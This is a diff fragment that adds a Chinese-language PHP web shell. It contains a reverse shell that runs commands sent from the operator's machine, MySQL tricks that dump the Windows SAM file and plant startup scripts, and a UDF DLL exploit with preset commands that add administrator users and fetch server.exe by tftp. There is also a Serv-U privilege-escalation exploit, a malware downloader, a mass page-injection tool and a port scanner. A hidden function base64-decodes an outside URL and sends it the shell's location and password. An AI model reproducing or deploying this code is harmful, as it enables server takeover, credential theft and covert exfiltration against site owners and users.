");
+ $newpath = explode('/',$_GET['newcopy']);
+ $pathr[0] = $newpath[0];
+ for($i=1;$i < count($newpath);$i++){
+ $pathr[] = urlencode($newpath[$i]);
+ }
+ $newcopy = implode('/',$pathr);
+ @copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
+ die('');
+ break;
+
+ case "perm":
+ html_n("");
+ break;
+
+ case "info_f":
+ $dis_func = get_cfg_var("disable_functions");
+ $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
+ $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from")."";
+ if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);}
+ $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+ $info = array(
+ array("服务器时间",date("Y年m月d日 h:i:s",time())),
+ array("服务器域名","".$_SERVER['SERVER_NAME'].""),
+ array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
+ array("服务器操作系统",PHP_OS),
+ array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+ array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
+ array("你的IP",$_SERVER["REMOTE_ADDR"]),
+ array("Web服务端口",$_SERVER['SERVER_PORT']),
+ array("PHP运行方式",strtoupper(php_sapi_name())),
+ array("PHP版本",PHP_VERSION),
+ array("运行于安全模式",Info_Cfg("safemode")),
+ array("服务器管理员",$adminmail),
+ array("本文件路径",myaddress),
+ array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
+ array("允许使用curl_exec",Info_Fun("curl_exec")),
+ array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
+ array("显示错误信息 display_errors",Info_Cfg("display_errors")),
+ array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
+ array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
+ array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
+ array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
+ array("允许最大上传文件 upload_max_filesize",$upsize),
+ array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
+ array("被禁用的函数 disable_functions",$dis_func),
+ array("phpinfo()",$phpinfo),
+ array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+ array("图形处理 GD Library",Info_Fun("imageline")),
+ array("IMAP电子邮件系统",Info_Fun("imap_close")),
+ array("MySQL数据库",Info_Fun("mysql_close")),
+ array("SyBase数据库",Info_Fun("sybase_close")),
+ array("Oracle数据库",Info_Fun("ora_close")),
+ array("Oracle 8 数据库",Info_Fun("OCILogOff")),
+ array("PREL相容语法 PCRE",Info_Fun("preg_match")),
+ array("PDF文档支持",Info_Fun("pdf_close")),
+ array("Postgre SQL数据库",Info_Fun("pg_close")),
+ array("SNMP网络管理协议",Info_Fun("snmpget")),
+ array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
+ array("XML解析",Info_Fun("xml_set_object")),
+ array("FTP",Info_Fun("ftp_login")),
+ array("ODBC数据库连接",Info_Fun("odbc_close")),
+ array("Session支持",Info_Fun("session_start")),
+ array("Socket支持",Info_Fun("fsockopen")),
+ );
+ $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
+ echo '';
+ for($i = 0;$i < count($info);$i++){echo '| '.$info[$i][0].' | '.$info[$i][1].' | '."\n";}
+try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
+$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
+$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
+}catch(Exception $e){}
+ echo '| Terminal Service端口为 | '.$registry_proxystring.' | '."\n";
+ echo '| Telnet端口为 | '.$Telnet.' | '."\n";
+ echo '| PcAnywhere端口为 | '.$PcAnywhere.' | '."\n";
+ echo ' ';
+ break;
+
+ case "nc":
+ $M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
+ $B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
+print<<
+使用方法:
+ 先在自己电脑运行"nc -l -p 1019"
+ 然后在此填写你电脑的IP,点连接!
+你的IP 端口号
+
+
+END;
+ if((!empty($_POST['mip'])) && (!empty($_POST['bport'])))
+ {
+ echo '';
+ $mip=$_POST['mip'];
+ $bport=$_POST['bport'];
+ $fp=fsockopen($mip , $bport , $errno, $errstr);
+ if (!$fp){
+ $result = "Error: could not open socket connection";
+ }else {
+ fputs ($fp ,"\n*********************************************\n
+ hacking url:http://www.7jyewu.cn/ is ok!
+ \n*********************************************\n\n");
+ while(!feof($fp)){
+ fputs ($fp," [r00t@H4c3ing:/root]# ");
+ $result= fgets ($fp, 4096);
+ $message=`$result`;
+ fputs ($fp,"--> ".$message."\n");
+ }
+ fclose ($fp);
+ }
+ echo ' ';
+ }
+ break;
+
+
+ case "sqlshell":
+ $MSG_BOX = '';
+ $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
+ if(isset($_POST['mhost']) && isset($_POST['muser']))
+ {
+ $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
+ if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
+ else $MSG_BOX = '连接MYSQL失败';
+ }
+ $downfile = 'c:/windows/repair/sam';
+ if(!empty($_POST['downfile']))
+ {
+ $downfile = File_Str($_POST['downfile']);
+ $binpath = bin2hex($downfile);
+ $query = 'select load_file(0x'.$binpath.')';
+ if($result = @mysql_query($query,$conn))
+ {
+ $k = 0; $downcode = '';
+ while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
+ $filedown = basename($downfile);
+ if(!$filedown) $filedown = 'envl.tmp';
+ $array = explode('.', $filedown);
+ $arrayend = array_pop($array);
+ header('Content-type: application/x-'.$arrayend);
+ header('Content-Disposition: attachment; filename='.$filedown);
+ header('Content-Length: '.strlen($downcode));
+ echo $downcode;
+ exit;
+ }
+ else $MSG_BOX = '下载文件失败';
+ }
+ $o = isset($_GET['o']) ? $_GET['o'] : '';
+print<<
+
+
+地址
+端口
+用户
+密码
+库名
+
+
+END;
+if($o == 'u')
+{
+ $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
+ if(!empty($_POST['uppath']))
+ {
+ $uppath = $_POST['uppath'];
+ $query = 'Create TABLE a (cmd text NOT NULL);';
+ if(@mysql_query($query,$conn))
+ {
+ if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
+ else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
+ $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
+ if(@mysql_query($query,$conn))
+ {
+ $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
+ $MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败';
+ }
+ else $MSG_BOX = '插入临时表失败';
+ @mysql_query('Drop TABLE IF EXISTS a;',$conn);
+ }
+ else $MSG_BOX = '创建临时表失败';
+ }
+print<<
上传路径
+
选择文件
+
+END;
+}
+elseif($o == 'd')
+{
+print<<
下载文件
+
+END;
+}
+else
+{
+ if(!empty($_POST['msql']))
+ {
+ $msql = $_POST['msql'];
+ if($result = @mysql_query($msql,$conn))
+ {
+ $MSG_BOX = '执行SQL语句成功
';
+ $k = 0;
+ while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+ }
+ else $MSG_BOX .= mysql_error();
+ }
+print<<
+function nFull(i){
+ Str = new Array(11);
+ Str[0] = "select version();";
+ Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
+ Str[2] = "select '' into outfile 'F:/web/bak.php';";
+ Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
+ nform.msql.value = Str[i];
+ return true;
+}
+
+
+
+
+
+END;
+}
+ if($MSG_BOX != '') echo ' '.$MSG_BOX.' ';
+ else echo '';
+ break;
+
+ case "downloader":
+ $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
+ $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
+print<<
+ 超连接
+ 下载到
+
+END;
+ if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
+ {
+ echo '';
+ $contents = @file_get_contents($_POST['durl']);
+ if(!$contents) echo '无法读取要下载的数据';
+ else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
+ echo ' ';
+ }
+ break;
+
+ case "issql":
+ session_start();
+ if($_POST['sqluser'] && $_POST['sqlpass']){
+ $_SESSION['sql_user'] = $_POST['sqluser'];
+ $_SESSION['sql_password'] = $_POST['sqlpass'];
+ }
+ if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
+ else{$_SESSION['sql_host'] = 'localhost';}
+ if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
+ else{$_SESSION['sql_port'] = '3306';}
+ if($_SESSION['sql_user'] && $_SESSION['sql_password']){
+ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
+ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
+ die(html_a('?eanver=sqlshell','连接失败请返回'));
+ }
+ }
+ else{
+ die(html_a('?eanver=sqlshell','连接失败请返回'));
+ }
+ $query = mysql_query("SHOW DATABASES",$sqlcon);
+ html_n('| 数据库列表:');
+ while($db = mysql_fetch_array($query)) {
+ html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
+ echo ' ';
+ }
+ html_n(' | ');
+ if($_GET['db']){
+ css_js("3");
+ mysql_select_db($_GET['db'], $sqlcon);
+ html_n('
');
+ if(!empty($_POST['sql'])){
+ if (@mysql_query($_POST['sql'],$sqlcon)) {
+ echo "执行SQL语句成功";
+ }else{
+ echo "出错: ".mysql_error();
+ }
+ }
+ if($_GET['table']){
+ html_n('');
+ $query = "SHOW COLUMNS FROM ".$_GET['table'];
+ $result = mysql_query($query,$sqlcon);
+ $fields = array();
+ while($row = mysql_fetch_assoc($result)){
+ array_push($fields,$row['Field']);
+ html_n('| '.$row['Field'].' | ');
+ }
+ html_n(' ');
+ $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
+ while($text = @mysql_fetch_assoc($result)){
+ foreach($fields as $row){
+ if($text[$row] == "") $text[$row] = 'NULL';
+ html_n('| '.$text[$row].' | ');
+ }
+ echo ' ';
+ }
+ }
+ else{
+ $query = "SHOW TABLES FROM " . $_GET['db'];
+ $dat = mysql_query($query, $sqlcon) or die(mysql_error());
+ while ($row = mysql_fetch_row($dat)){
+ html_n("| ".$row[0]." | ");
+ }
+ }
+ }
+ break;
+
+ case "upfiles":
+ html_n('| 服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'');
+ break;
+
+ case "guama":
+ $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
+ $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
+ $codet = isset($_POST['code']) ? $_POST['code'] : "";
+ html_n(' | | 文件类型请用"|"隔开,也可以是指定文件名. | ');
+ if(!empty($_POST['path'])){
+ html_n('目标文件:
');
+ if(isset($_POST['pass'])) $bool = true; else $bool = false;
+ do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
+ }
+ break;
+
+ case "tihuan":
+ html_n(' | 此功能可批量替换文件内容,请小心使用.
| ');
+ if(!empty($_POST['path'])){
+ html_n('目标文件:
');
+ if(isset($_POST['pass'])) $bool = true; else $bool = false;
+ do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
+ }
+ break;
+
+ case "scanfile":
+ css_js("4");
+ html_n(' | 此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.
当服务器文件太多时,会影响执行速度,不建议使用目录遍历. | ');
+ if(!empty($_POST['path'])){
+ html_n('找到文件:
');
+ if(isset($_POST['pass'])) $bool = true; else $bool = false;
+ do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
+ }
+ break;
+
+ case "scanphp":
+ html_n(' | | 原理是根据特征码定义的,请查看代码判断后再进行删除. | ');
+ if(!empty($_POST['path'])){
+ html_n('找到文件:
');
+ if(isset($_POST['pass'])) $bool = true; else $bool = false;
+ do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
+ }
+ break;
+
+ case "port":
+ $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
+ $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631';
+print<<
+扫描IP
+端口号
+
+
+END;
+ if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
+ {
+ echo '';
+ $ports = explode('|', $_POST['port']);
+ for($i = 0;$i < count($ports);$i++)
+ {
+ $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
+ echo $fp ? '开放端口 ---> '.$ports[$i].'
' : '关闭端口 ---> '.$ports[$i].'
';
+ ob_flush();
+ flush();
+ }
+ echo ' ';
+ }
+ break;
+
+
+ case "getcode":
+if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "
获取 URL 内容失败 ";exit;}
+print<<
+ |
+END;
+ break;
+
+ case "servu":
+ $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
+print<<[执行命令] [添加用户]
+';
+ if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
+ {
+ echo '';
+ $sendbuf = "";
+ $recvbuf = "";
+ $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
+ $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
+ "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
+ "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
+ $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
+ $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
+ $recvbuf = @fgets($sock, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = "USER ".$_POST["SUUser"]."\r\n";
+ @fputs($sock, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($sock, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
+ @fputs($sock, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($sock, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = "SITE MAINTENANCE\r\n";
+ @fputs($sock, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($sock, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = $domain;
+ @fputs($sock, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($sock, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = $adduser;
+ @fputs($sock, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($sock, 1024);
+ echo "返回数据包: $recvbuf
";
+ if(!empty($_POST['SUCommand']))
+ {
+ $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
+ $recvbuf = @fgets($exp, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = "USER ".$_POST['user']."\r\n";
+ @fputs($exp, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($exp, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = "PASS ".$_POST['password']."\r\n";
+ @fputs($exp, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($exp, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
+ @fputs($exp, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: site exec ".$_POST["SUCommand"]."
";
+ $recvbuf = @fgets($exp, 1024);
+ echo "返回数据包: $recvbuf
";
+ $sendbuf = $deldomain;
+ @fputs($sock, $sendbuf, strlen($sendbuf));
+ echo "发送数据包: $sendbuf
";
+ $recvbuf = @fgets($sock, 1024);
+ echo "返回数据包: $recvbuf
";
+ @fclose($exp);
+ }
+ @fclose($sock);
+ echo ' ';
+ }
+ break;
+
+ case "eval":
+ $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
+ html_n('| ');
+ break;
+
+ case "myexp":
+ $MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
+ $info = '命令回显';
+ $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver';
+ if(isset($_POST['mhost']) && isset($_POST['muser']))
+ {
+ $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
+ $conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
+ if($conn)
+ {
+ @mysql_select_db($mdata);
+ if((!empty($_POST['outdll'])) && (!empty($_POST['mpath'])))
+ {
+ $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
+ if(@mysql_query($query,$conn))
+ {
+ $shellcode = Mysql_shellcode();
+ $query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
+ if(@mysql_query($query,$conn))
+ {
+ $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
+ if(@mysql_query($query,$conn))
+ {
+ $ap = explode('/', $mpath); $inpath = array_pop($ap);
+ $query = 'Create Function state returns string soname \''.$inpath.'\';';
+ $MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败';
+ }
+ else $MSG_BOX = '导出DLL文件失败';
+ }
+ else $MSG_BOX = '写入临时表失败';
+ @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
+ }
+ else $MSG_BOX = '创建临时表失败';
+ }
+ if(!empty($_POST['runcmd']))
+ {
+ $query = 'select state("'.$sqlcmd.'");';
+ $result = @mysql_query($query,$conn);
+ if($result)
+ {
+ $k = 0; $info = NULL;
+ while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
+ $info = $infotmp;
+ $MSG_BOX = '执行成功';
+ }
+ else $MSG_BOX = '执行失败';
+ }
+ }
+ else $MSG_BOX = '连接MYSQL失败';
+ }
+print<<
+function Fullm(i){
+ Str = new Array(11);
+ Str[0] = "ver";
+ Str[1] = "net user envl envl /add";
+ Str[2] = "net localgroup administrators envl /add";
+ Str[3] = "net start Terminal Services";
+ Str[4] = "tasklist /svc";
+ Str[5] = "netstat -ano";
+ Str[6] = "ipconfig";
+ Str[7] = "net user guest /active:yes";
+ Str[8] = "copy c:\\\\1.php d:\\\\2.php";
+ Str[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
+ Str[10] = "net start telnet";
+ Str[11] = "shutdown -r -t 0";
+ mform.sqlcmd.value = Str[i];
+ return true;
+}
+
+
+END;
+ break;
+
+
+ case "mysql_exec":
+ if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
+ {
+ if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
+ {
+ $cookietime = time() + 24 * 3600;
+ setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
+ setcookie('m_eanverport',$_POST['mport'],$cookietime);
+ setcookie('m_eanveruser',$_POST['muser'],$cookietime);
+ setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
+ die('正在登陆,请稍候...');
+ }
+ }
+print<<
+ 地址
+端口
+用户
+密码
+
+
+END;
+break;
+
+case "mysql_msg":
+ $conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
+ if($conn)
+ {
+print<<
+function Delok(msg,gourl)
+{
+ smsg = "确定要删除[" + unescape(msg) + "]吗?";
+ if(confirm(smsg)){window.location = gourl;}
+}
+function Createok(ac)
+{
+ if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
+ if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
+ if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
+ return false;
+}
+
+END;
+ $BOOL = false;
+ $MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].' 地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' 版本:';
+ $k = 0;
+ $result = @mysql_query('select version();',$conn);
+ while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+ echo ' 数据库:';
+ $result = mysql_query("SHOW DATABASES",$conn);
+ while($db = mysql_fetch_array($result)){echo ' [ '.$db['Database'].']';}
+ echo ' '.$MSG_BOX.' ';
+ if(isset($_GET['edit']))
+ {
+ if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
+ echo '';
+ }
+ else
+ {
+ $query = 'SHOW COLUMNS FROM '.$_GET['table'];
+ $result = mysql_query($query,$conn);
+ $fields = array();
+ $pagesize=20;
+ $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
+ $numrows=$row_num;
+ $pages=intval($numrows/$pagesize);
+ if ($numrows%$pagesize) $pages++;
+ $offset=$pagesize*($page - 1);
+ $page=$_GET['p'];
+ if(!$page) $page=1;
+
+ if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
+ echo '';
+ echo '| 操作 | ';
+ while($row = @mysql_fetch_assoc($result))
+ {
+ array_push($fields,$row['Field']);
+ echo ''.$row['Field'].' | ';
+ }
+ echo ' ';
+ if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
+ $result = mysql_query($query,$conn);
+ $v = $p;
+ while($text = @mysql_fetch_assoc($result))
+ {
+ echo '| 修改 ';
+ echo ' 删除 | ';
+ foreach($fields as $row){echo ''.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).' | ';}
+ echo ' '."\r\n";$v++;
+ }
+ echo '
';
+ $pagep=$page-1;
+ $pagen=$page+1;
+ echo "共有 ".$row_num." 条记录 ";
+ if($pagep>0) $pagenav.=" 首页 上一页 "; else $pagenav.=" 上一页 ";
+ if($pagen<=$pages) $pagenav.=" 下一页 尾页"; else $pagenav.=" 下一页 ";
+ $pagenav.=" 第 [".$page."/".$pages."] 页 跳到 页";
+ echo $pagenav;
+ echo ' ';
+ echo '| 表名 | ';
+ echo ' 操作 | ';
+ echo ' 字符集 | ';
+ echo ' 大小 | ';
+ $result = @mysql_query($query,$conn);
+ $k = 0;
+ while($table = mysql_fetch_row($result))
+ {
+ $charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
+ echo '| '.$table[0].' | ';
+ echo ' 插入 删除 | ';
+ echo ''.$statucoll[$k].' | '.File_Size($statusize[$k]).' | '."\r\n";
+ $k++;
+ }
+ echo '
';
+ }
+ }
+ }
+ else die('连接MYSQL失败,请重新登陆.');
+ if(!$BOOL and addslashes($query)!='') echo '';
+break;
+
+
+ default: html_main($path,$shellname); break;
+}
+css_foot();
+
+/*---doing---*/
+
+function do_write($file,$t,$text)
+{
+ $key = true;
+ $handle = @fopen($file,$t);
+ if(!@fwrite($handle,$text))
+ {
+ @chmod($file,0666);
+ $key = @fwrite($handle,$text) ? true : false;
+ }
+ @fclose($handle);
+ return $key;
+}
+
+function do_show($filepath){
+ $show = array();
+ $dir = dir($filepath);
+ while($file = $dir->read()){
+ if($file == '.' or $file == '..') continue;
+ $files = str_path($filepath.'/'.$file);
+ $show[] = $files;
+ }
+ $dir->close();
+ return $show;
+}
+
+function do_deltree($deldir){
+ $showfile = do_show($deldir);
+ foreach($showfile as $del){
+ if(is_dir($del)){
+ if(!do_deltree($del)) return false;
+ }elseif(!is_dir($del)){
+ @chmod($del,0777);
+ if(!@unlink($del)) return false;
+ }
+ }
+ @chmod($deldir,0777);
+ if(!@rmdir($deldir)) return false;
+ return true;
+}
+
+function do_showsql($query,$conn){
+ $result = @mysql_query($query,$conn);
+ html_n('
');
+}
+
+function hmlogin($xiao=1){
+ @set_time_limit(10);
+ $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+ $serverp = envlpass;
+ $copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
+ $url=$copyurl.$serveru.'&p='.$serverp;
+ $url=urldecode($url);
+ $re=file_get_contents($url);
+
+$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+$serverp = envlpass;
+if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "";}else{geturl();}}
+}
+
+function do_down($fd){
+ if(!@file_exists($fd)) msg('下载文件不存在');
+ $fileinfo = pathinfo($fd);
+ header('Content-type: application/x-'.$fileinfo['extension']);
+ header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+ header('Content-Length: '.filesize($fd));
+ @readfile($fd);
+ exit;
+}
+
+function do_download($filecode,$file){
+ header("Content-type: application/unknown");
+ header('Accept-Ranges: bytes');
+ header("Content-length: ".strlen($filecode));
+ header("Content-disposition: attachment; filename=".$file.";");
+ echo $filecode;
+ exit;
+}
+
+function TestUtf8($text)
+{if(strlen($text) < 3) return false;
+$lastch = 0;
+$begin = 0;
+$BOM = true;
+$BOMchs = array(0xEF, 0xBB, 0xBF);
+$good = 0;
+$bad = 0;
+$notAscii = 0;
+for($i=0; $i < strlen($text); $i++)
+{$ch = ord($text[$i]);
+if($begin < 3)
+{ $BOM = ($BOMchs[$begin]==$ch);
+$begin += 1;
+continue; }
+if($begin==4 && $BOM) break;
+if($ch >= 0x80 ) $notAscii++;
+if( ($ch&0xC0) == 0x80 )
+{if( ($lastch&0xC0) == 0xC0 )
+{$good += 1;}
+else if( ($lastch&0x80) == 0 )
+{$bad += 1; }}
+else if( ($lastch&0xC0) == 0xC0 )
+{$bad += 1;}
+$lastch = $ch;}
+if($begin == 4 && $BOM)
+{return 2;}
+else if($notAscii==0)
+{return 1;}
+else if ($good >= $bad )
+{return 2;}
+else
+{return 0;}}
+
+function File_Str($string)
+{
+ return str_replace('//','/',str_replace('\\','/',$string));
+}
+
+function File_Write($filename,$filecode,$filemode)
+{
+ $key = true;
+ $handle = @fopen($filename,$filemode);
+ if(!@fwrite($handle,$filecode))
+ {
+ @chmod($filename,0666);
+ $key = @fwrite($handle,$filecode) ? true : false;
+ }
+ @fclose($handle);
+ return $key;
+}
+
+function File_Mode()
+{
+ $RealPath = realpath('./');
+ $SelfPath = $_SERVER['PHP_SELF'];
